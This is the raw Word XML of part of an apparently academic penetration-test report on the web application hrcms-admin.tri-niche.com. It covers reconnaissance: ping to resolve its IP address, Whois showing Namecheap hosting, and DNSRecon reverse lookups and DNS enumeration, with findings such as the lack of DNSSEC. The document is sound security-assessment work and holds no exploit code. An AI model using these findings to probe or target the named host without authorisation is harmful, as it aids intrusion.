      <w:r w:rsidR="00005335">
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> discovered</w:t>
      </w:r>
      <w:r w:rsidR="00A0620F">
        <w:t xml:space="preserve"> first</w:t>
      </w:r>
      <w:r w:rsidR="00986207">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which will be useful information in performing future scans and tests. Typically, one of the most common methods used, the IP address can be revealed by simply using the </w:t>
      </w:r>
      <w:r w:rsidR="00191670">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>Ping</w:t>
      </w:r>
      <w:r w:rsidR="00191670">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command through the Terminal on Linux or Command Prompt on Windows Systems. This command is used to test</w:t>
      </w:r>
      <w:r w:rsidR="00986207">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">connectivity, reachability, and name resolution. Hence, to get the IP address of the server, the </w:t>
      </w:r>
      <w:r w:rsidR="00903651">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>Ping</w:t>
      </w:r>
      <w:r w:rsidR="00903651">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command was used with the domain name of the web application, which is “hrcms-admin.tri-niche.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2868"/>
      </w:tblGrid>
      <w:tr w:rsidR="00370CCC" w14:paraId="69ADD096" w14:textId="77777777" w:rsidTr="002C14E6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F2810C0" w14:textId="77777777" w:rsidR="00370CCC" w:rsidRDefault="00370CCC" w:rsidP="002C14E6">
            <w:r w:rsidRPr="00B11899">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C27FDCE" wp14:editId="48A6A974">
                  <wp:extent cx="3985404" cy="1174506"/>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4076010" cy="1201208"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F1750A5" w14:textId="0B7D9C93" w:rsidR="00370CCC" w:rsidRDefault="00370CCC" w:rsidP="00913422">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Th</w:t>
            </w:r>
            <w:r w:rsidR="3542105B">
              <w:t>e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> web application is discovered to be hosted on a remote server at IP address </w:t>
            </w:r>
            <w:r w:rsidRPr="001E7E02">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>198.54.115.179</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C7D9AF1" w14:textId="77777777" w:rsidR="00370CCC" w:rsidRDefault="00370CCC" w:rsidP="00FA2BCB">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C27CDCA" w14:textId="77777777" w:rsidR="00E957D7" w:rsidRDefault="00E957D7" w:rsidP="00C743E0"/>
    <w:p w14:paraId="6C9C6C69" w14:textId="781DD643" w:rsidR="001D0BDE" w:rsidRDefault="008036E5" w:rsidP="00CF2E38">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc93487277"/>
      <w:bookmarkStart w:id="6" w:name="_Toc93502852"/>
      <w:bookmarkStart w:id="7" w:name="_Toc93526885"/>
      <w:bookmarkStart w:id="8" w:name="_Toc94100214"/>
      <w:r>
        <w:t>Passive Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="5CEA17DE" w14:textId="06C9400A" w:rsidR="00C27F9B" w:rsidRDefault="00257EC4" w:rsidP="003132EA">
      <w:r>
        <w:t>During this phase,</w:t>
      </w:r>
      <w:r w:rsidR="00DA7668">
        <w:t xml:space="preserve"> information </w:t>
      </w:r>
      <w:r w:rsidR="00505865">
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="00DA7668">
        <w:t xml:space="preserve"> g</w:t>
      </w:r>
      <w:r w:rsidR="00903651">
        <w:t>athered</w:t>
      </w:r>
      <w:r w:rsidR="00DA7668">
        <w:t xml:space="preserve"> about the target web application through publicly available information without actively engaging with the system.</w:t>
      </w:r>
      <w:r w:rsidR="007D3C39">
        <w:t xml:space="preserve"> This section </w:t>
      </w:r>
      <w:r w:rsidR="00AB73F5">
        <w:t>discuss</w:t>
      </w:r>
      <w:r w:rsidR="00CF51B9">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="007D3C39">
        <w:t xml:space="preserve"> about the tools used to perform passive reconnaissance</w:t>
      </w:r>
      <w:r w:rsidR="00274136">
        <w:t xml:space="preserve"> and the findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0E3B30" w14:textId="77777777" w:rsidR="00F53D90" w:rsidRPr="00C27F9B" w:rsidRDefault="00F53D90" w:rsidP="00C27F9B"/>
    <w:p w14:paraId="63675EEA" w14:textId="572C6E9D" w:rsidR="000D4F91" w:rsidRDefault="000D4F91" w:rsidP="00CF2E38">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc93487278"/>
      <w:bookmarkStart w:id="10" w:name="_Toc93502853"/>
      <w:bookmarkStart w:id="11" w:name="_Toc93526886"/>
      <w:bookmarkStart w:id="12" w:name="_Toc94100215"/>
      <w:r>
        <w:t>Network Resources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="33E23C69" w14:textId="2FF4E389" w:rsidR="004878BE" w:rsidRDefault="00C83AF9" w:rsidP="001F2C42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Information retrieved in this section </w:t>
      </w:r>
      <w:r w:rsidR="0205289A">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gathered </w:t>
      </w:r>
      <w:r w:rsidR="00E25F75">
        <w:t>from the open network resources in the public space. These resources can include Domain Name Registration Record in the Registry of Registrar and records in the Domain Name Server.</w:t>
      </w:r>
      <w:r w:rsidR="004878BE">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC28D2E" w14:textId="18814FE1" w:rsidR="00595CEA" w:rsidRDefault="00595CEA" w:rsidP="00FA2BCB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Whois</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D93A177" w14:textId="3363FB4D" w:rsidR="00BC7EA3" w:rsidRPr="005E6811" w:rsidRDefault="002B6FFE" w:rsidP="005E6811">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r w:rsidR="001D4BF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Yi Qian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FA4950" w14:textId="15AD4031" w:rsidR="00595CEA" w:rsidRDefault="000C0E23" w:rsidP="003132EA">
      <w:r>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:r w:rsidR="005A295D">
        <w:t xml:space="preserve">get </w:t>
      </w:r>
      <w:r w:rsidR="00343CB7">
        <w:t>information about the owner of the domain</w:t>
      </w:r>
      <w:r w:rsidR="00C77C5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A0872">
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidR="00C77C5C">
        <w:t xml:space="preserve"> the Internet records, W</w:t>
      </w:r>
      <w:r w:rsidR="00595CEA">
        <w:t>hois</w:t>
      </w:r>
      <w:r w:rsidR="00C77C5C">
        <w:t xml:space="preserve"> tool was used </w:t>
      </w:r>
      <w:r w:rsidR="0092706B">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="004B7EAF">
        <w:t xml:space="preserve"> the IP address of</w:t>
      </w:r>
      <w:r w:rsidR="00595CEA">
        <w:t xml:space="preserve"> hrcms-admin.tri-niche.com</w:t>
      </w:r>
      <w:r w:rsidR="00130D53">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B2201A">
        <w:t>Whois gathers</w:t>
      </w:r>
      <w:r w:rsidR="003443E4">
        <w:t xml:space="preserve"> information </w:t>
      </w:r>
      <w:r w:rsidR="00F268D9">
        <w:t>from the Registry database which resides with the Registra</w:t>
      </w:r>
      <w:r w:rsidR="004C6A6E">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="003443E4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004C6A6E">
        <w:t xml:space="preserve"> The information </w:t>
      </w:r>
      <w:r w:rsidR="001D72CE">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="004C6A6E">
        <w:t xml:space="preserve"> all published and does not send any</w:t>
      </w:r>
      <w:r w:rsidR="001D72CE">
        <w:t xml:space="preserve"> packets to the web application server. </w:t>
      </w:r>
      <w:r w:rsidR="009E7CB9">
        <w:t>Based on this information</w:t>
      </w:r>
      <w:r w:rsidR="00E90011">
        <w:t xml:space="preserve"> gathered</w:t>
      </w:r>
      <w:r w:rsidR="009E7CB9">
        <w:t>, t</w:t>
      </w:r>
      <w:r w:rsidR="00595CEA">
        <w:t xml:space="preserve">he web application </w:t>
      </w:r>
      <w:r w:rsidR="008F405E">
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="00595CEA">
        <w:t xml:space="preserve"> found to be hosted by Namecheap</w:t>
      </w:r>
      <w:r w:rsidR="00DB3DBD">
        <w:t xml:space="preserve"> Inc</w:t>
      </w:r>
      <w:r w:rsidR="00595CEA">
        <w:t>. Namecheap is a domain name registrar which provides services such as domain name registration and web hosting in Phoenix, Arizona,</w:t>
      </w:r>
      <w:r w:rsidR="002C6658">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A4C1F">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="002C6658">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00595CEA">
        <w:t>United States.</w:t>
      </w:r>
      <w:r w:rsidR="007744C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166"/>
      </w:tblGrid>
      <w:tr w:rsidR="00595CEA" w14:paraId="1CB3C996" w14:textId="77777777" w:rsidTr="002C14E6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19DB52C3" w14:textId="14A17E39" w:rsidR="00595CEA" w:rsidRDefault="00F44603" w:rsidP="002C14E6">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658243" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AA6BC57" wp14:editId="6D0E5DD5">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>758</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>1952800</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1213422" cy="84732"/>
                      <wp:effectExtent l="0" t="0" r="25400" b="10795"/>
                      <wp:wrapNone/>
                      <wp:docPr id="50" name="Rectangle 50"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1213422" cy="847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2AC8A9">
                    <v:rect id="Rectangle 50" style="position:absolute;margin-left:.05pt;margin-top:153.75pt;width:95.55pt;height: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2D81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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658242" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00A48604" wp14:editId="141E4E73">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>-1500</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>865137</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1680518" cy="84732"/>
                      <wp:effectExtent l="0" t="0" r="15240" b="10795"/>
                      <wp:wrapNone/>
                      <wp:docPr id="42" name="Rectangle 42"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1680518" cy="847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2087AF">
                    <v:rect id="Rectangle 42" style="position:absolute;margin-left:-.1pt;margin-top:68.1pt;width:132.3pt;height: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7B94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TegwIAAGg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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658241" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38E371BD" wp14:editId="1461EA2F">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>2030</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>1412365</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1592256" cy="84732"/>
                      <wp:effectExtent l="0" t="0" r="27305" b="10795"/>
                      <wp:wrapNone/>
                      <wp:docPr id="40" name="Rectangle 40"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1592256" cy="847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6C8336">
                    <v:rect id="Rectangle 40" style="position:absolute;margin-left:.15pt;margin-top:111.2pt;width:125.35pt;height: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D27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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00595CEA" w:rsidRPr="00B95B60">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71CDBE47" wp14:editId="3D1761C4">
                  <wp:extent cx="2599856" cy="3871356"/>
                  <wp:effectExtent l="0" t="0" r="6985"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2599856" cy="3871356"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E02CE5F" w14:textId="6CFB10A2" w:rsidR="00595CEA" w:rsidRDefault="00595CEA" w:rsidP="002C14E6">
            <w:r w:rsidRPr="006B0D3F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74E2C35E" wp14:editId="2F0135BF">
                  <wp:extent cx="3243635" cy="387985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3243635" cy="3879850"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E1DA445" w14:textId="56D1DA08" w:rsidR="00595CEA" w:rsidRDefault="00595CEA" w:rsidP="00595CEA"/>
    <w:p w14:paraId="398E92FF" w14:textId="77777777" w:rsidR="004878BE" w:rsidRDefault="004878BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0454F961" w14:textId="0934618A" w:rsidR="00427101" w:rsidRDefault="00427101" w:rsidP="00F81A1B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DNSRecon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5244172F" w14:textId="68191540" w:rsidR="004E66EA" w:rsidRPr="004E66EA" w:rsidRDefault="004E66EA" w:rsidP="004E66EA">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by: Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B68B574" w14:textId="51ABC956" w:rsidR="00830BF6" w:rsidRDefault="00676529" w:rsidP="003132EA">
      <w:r>
        <w:t xml:space="preserve">Based on the </w:t>
      </w:r>
      <w:r w:rsidR="00501DC6">
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>hois scan, it reveal</w:t>
      </w:r>
      <w:r w:rsidR="00135C87">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A62146">
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP address range that can be used for reverse </w:t>
      </w:r>
      <w:r w:rsidR="00C258F2">
        <w:t xml:space="preserve">searches </w:t>
      </w:r>
      <w:r w:rsidR="00EE5E4F">
        <w:t>for domain names.</w:t>
      </w:r>
      <w:r w:rsidR="00CE3BED">
        <w:t xml:space="preserve"> DNSRecon is a DNS reconnaissance tool that can perform a variety of enumerations, such as standard record enumeration, Zone transfer, Reverse lookup, Google lookup, and Domain Brute-Forcing.</w:t>
      </w:r>
      <w:r w:rsidR="001245AC">
        <w:t xml:space="preserve"> This is essential in mapping the network</w:t>
      </w:r>
      <w:r w:rsidR="003A4FB3">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001245AC">
        <w:t xml:space="preserve"> but based on the scope of the </w:t>
      </w:r>
      <w:r w:rsidR="00750BBF">
        <w:t>project, pen</w:t>
      </w:r>
      <w:r w:rsidR="0018029B">
        <w:t>-testing would on</w:t>
      </w:r>
      <w:r w:rsidR="002F101D">
        <w:t xml:space="preserve">ly be </w:t>
      </w:r>
      <w:r w:rsidR="4CD80D12">
        <w:t>conducted</w:t>
      </w:r>
      <w:r w:rsidR="002F101D">
        <w:t xml:space="preserve"> on the server that hosts the web application.</w:t>
      </w:r>
      <w:r w:rsidR="00D0134D">
        <w:t xml:space="preserve"> As depicted in the results below, </w:t>
      </w:r>
      <w:r w:rsidR="005C2C01">
        <w:t xml:space="preserve">2695 records </w:t>
      </w:r>
      <w:r w:rsidR="007031C5">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="005C2C01">
        <w:t xml:space="preserve"> discovered by performing a reverse look</w:t>
      </w:r>
      <w:r w:rsidR="00997A9D">
        <w:t>up</w:t>
      </w:r>
      <w:r w:rsidR="00830BF6">
        <w:t>, using the -r flag,</w:t>
      </w:r>
      <w:r w:rsidR="005C2C01">
        <w:t xml:space="preserve"> based on the IP address range</w:t>
      </w:r>
      <w:r w:rsidR="00702524">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00192818">
        <w:t xml:space="preserve"> 19</w:t>
      </w:r>
      <w:r w:rsidR="00C55C5A">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00192818">
        <w:t>.54.112.</w:t>
      </w:r>
      <w:r w:rsidR="00C55C5A">
        <w:t>0 to 198.54.127.255</w:t>
      </w:r>
      <w:r w:rsidR="00702524">
        <w:t xml:space="preserve">, as seen in the </w:t>
      </w:r>
      <w:r w:rsidR="009122E4">
        <w:t>Who</w:t>
      </w:r>
      <w:r w:rsidR="00275115">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="009122E4">
        <w:t>s scan</w:t>
      </w:r>
      <w:r w:rsidR="00A858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186E" w14:paraId="3A34A44B" w14:textId="77777777" w:rsidTr="00F0186E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69A7073E" w14:textId="1AAE38B1" w:rsidR="00F0186E" w:rsidRDefault="00F0186E" w:rsidP="008E2256">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C1A902" wp14:editId="238E9E02">
                  <wp:extent cx="2789271" cy="4135120"/>
                  <wp:effectExtent l="0" t="0" r="762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2058"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2789271" cy="4135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47CDB8BA" w14:textId="7C98372B" w:rsidR="00F0186E" w:rsidRDefault="00BF4F63" w:rsidP="008E2256">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658244" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61EA1B00" wp14:editId="6D60EFC0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>-1397</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>3948709</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="793699" cy="83693"/>
                      <wp:effectExtent l="0" t="0" r="26035" b="12065"/>
                      <wp:wrapNone/>
                      <wp:docPr id="58" name="Rectangle 58"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="793699" cy="836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457D25">
                    <v:rect id="Rectangle 58" style="position:absolute;margin-left:-.1pt;margin-top:310.9pt;width:62.5pt;height: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1F90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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00F0186E">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54F39269" wp14:editId="4AE2FB71">
                  <wp:extent cx="2177625" cy="4135272"/>
                  <wp:effectExtent l="0" t="0" r="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0379"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2177625" cy="41352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DDBBF3" w14:textId="77777777" w:rsidR="00C33C41" w:rsidRDefault="00C33C41" w:rsidP="00595CEA"/>
    <w:p w14:paraId="6FAA244E" w14:textId="77777777" w:rsidR="004878BE" w:rsidRDefault="004878BE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD5C66" w14:textId="4C5BDCE0" w:rsidR="004808EC" w:rsidRDefault="002073C3" w:rsidP="003132EA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="000B1731">
        <w:t xml:space="preserve">sing the -d flag and the domain name of the web application, </w:t>
      </w:r>
      <w:r w:rsidR="000D7977">
        <w:t>it would perform a standard DNS enumeration</w:t>
      </w:r>
      <w:r w:rsidR="003B34E5">
        <w:t xml:space="preserve">. As seen below, it is not using </w:t>
      </w:r>
      <w:r w:rsidR="00BB1B2F">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="003B1B21">
        <w:t xml:space="preserve">omain </w:t>
      </w:r>
      <w:r w:rsidR="00F9475B">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="003B1B21">
        <w:t xml:space="preserve">ame </w:t>
      </w:r>
      <w:r w:rsidR="00F9475B">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="003B1B21">
        <w:t xml:space="preserve">ystem </w:t>
      </w:r>
      <w:r w:rsidR="00F9475B">
        <w:t>Security Extensions (</w:t>
      </w:r>
      <w:r w:rsidR="003B34E5">
        <w:t>DNSS</w:t>
      </w:r>
      <w:r w:rsidR="00F9475B">
        <w:t>EC)</w:t>
      </w:r>
      <w:r w:rsidR="00624E10">
        <w:t xml:space="preserve">, which is used to </w:t>
      </w:r>
      <w:r w:rsidR="00624E10" w:rsidRPr="00624E10">
        <w:t>strengthen authentication in DNS using digital signatures based on public</w:t>
      </w:r>
      <w:r w:rsidR="00DF411F">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00624E10" w:rsidRPr="00624E10">
        <w:t>key cryptography.</w:t>
      </w:r>
      <w:r w:rsidR="00624E10">
        <w:t xml:space="preserve"> Moreover,</w:t>
      </w:r>
      <w:r w:rsidR="003B34E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD6D9B">
        <w:t xml:space="preserve">no </w:t>
      </w:r>
      <w:r w:rsidR="000F67A0">
        <w:t>Mail Exchange (</w:t>
      </w:r>
      <w:r w:rsidR="00BD6D9B">
        <w:t>MX</w:t>
      </w:r>
      <w:r w:rsidR="000F67A0">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00BD6D9B">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="000F67A0">
        <w:t>Name Server (</w:t>
      </w:r>
      <w:r w:rsidR="00BD6D9B">
        <w:t>NS</w:t>
      </w:r>
      <w:r w:rsidR="000F67A0">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00BD6D9B">
        <w:t xml:space="preserve"> Records</w:t>
      </w:r>
      <w:r w:rsidR="00846879">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD6D9B">
        <w:t>were found.</w:t>
      </w:r>
      <w:r w:rsidR="00624E10">
        <w:t xml:space="preserve"> No interesting </w:t>
      </w:r>
      <w:r w:rsidR="00470667">
        <w:t>Service (</w:t>
      </w:r>
      <w:r w:rsidR="00624E10">
        <w:t>SRV</w:t>
      </w:r>
      <w:r w:rsidR="00470667">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00624E10">
        <w:t xml:space="preserve"> records</w:t>
      </w:r>
      <w:r w:rsidR="00DD30BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00624E10">
        <w:t>were noticed</w:t>
      </w:r>
      <w:r w:rsidR="00761C52">
        <w:t xml:space="preserve"> as well</w:t>
      </w:r>
      <w:r w:rsidR="00624E10">
        <w:t>.</w:t>
      </w:r>
